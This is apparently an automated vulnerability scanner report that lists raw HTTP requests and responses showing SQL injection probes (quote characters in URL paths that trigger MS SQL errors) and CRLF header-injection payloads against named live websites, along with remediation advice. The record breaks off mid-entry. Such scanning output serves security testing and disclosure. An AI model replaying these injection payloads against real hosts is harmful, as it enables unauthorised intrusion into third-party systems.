GET /store'/RPMobileEnterpriseServices.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=CDLKIDJBJKJDFEMJMDIPNNBJ; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMobileEnterpriseServices.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=EDLKIDJBFDJKFCPNANPKCMHE; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPPREPMOBSERV.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=DELKIDJBIHGFDACPGCMJLBKE; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPPREPMOBSERV.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=EELKIDJBMNKKLNNNJJOGMJCP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPWiMAXandLTE.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=CFLKIDJBICMJLIHJHKEIKGPP; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPWiMAXandLTE.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=EFLKIDJBCBILODGLKBMCGBGF; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ame_100930.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=BJMKIDJBGCKOKCIKMODHDMKD; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ame_100930.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=DJMKIDJBKJEEDCLDEJDBONIA; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ame_101117.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=GILKIDJBCCNINELBFIFKENLC; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ame_101117.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=JILKIDJBJCCBEGJIFPFOOBCD; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ap_101105.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=APLKIDJBHGKMFLDAGFOPBCIL; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ap_101105.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=CPLKIDJBEGOOBELBNNJFJEDN; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_eur_101025.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=IFMKIDJBOBBACJOLFGMCLHOO; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_eur_101025.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=LFMKIDJBGFJMICBFCJEGCDNK; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101005.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=FEMKIDJBEKNKELOCOLCEFOML; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101005.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=MEMKIDJBAHHNMMNFPJGBJHBA; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101109.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=MHLKIDJBNLNHJOBFJIIHKKON; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101109.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=NHLKIDJBHDNFFOJEBABLBNBE; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101118.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=JGLKIDJBCIEIJIJKMAAHNJAH; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101118.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=KGLKIDJBKGBDJGEFJNGGOGDG; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101124.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=HELKIDJBCEPCMGLFIBJIODNP; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101124.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=KELKIDJBOFNGFIAAAPJLNGJJ; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/shopping_cart.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=PIKKIDJBMHKCHJPNDILBHLKB; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/shopping_cart.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=AJKKIDJBDEKNOGBMMJNLCENO; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
2. HTTP header injectionpreviousnext There are 8 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fb682%0d%0aeb8d44f6d4b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0fb682%0d%0aeb8d44f6d4b; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 25305%0d%0ad8582cf193d was submitted in the Pos parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=1923520&Page=&PluID=0&Pos=8190\25305%0d%0ad8582cf193d HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 671ca%0d%0a4758775fddb was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0671ca%0d%0a4758775fddb; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3d26%0d%0a75b00643908 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3d26%0d%0a75b00643908; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 5ab67%0d%0a00ff500b54 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=5ab67%0d%0a00ff500b54&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio Origin: http://www.informationweek.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload 8e592%0d%0a9007e5dc7c was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=0&res=8e592%0d%0a9007e5dc7c HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio Origin: http://www.informationweek.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 1cada%0d%0a5d5c234479e was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
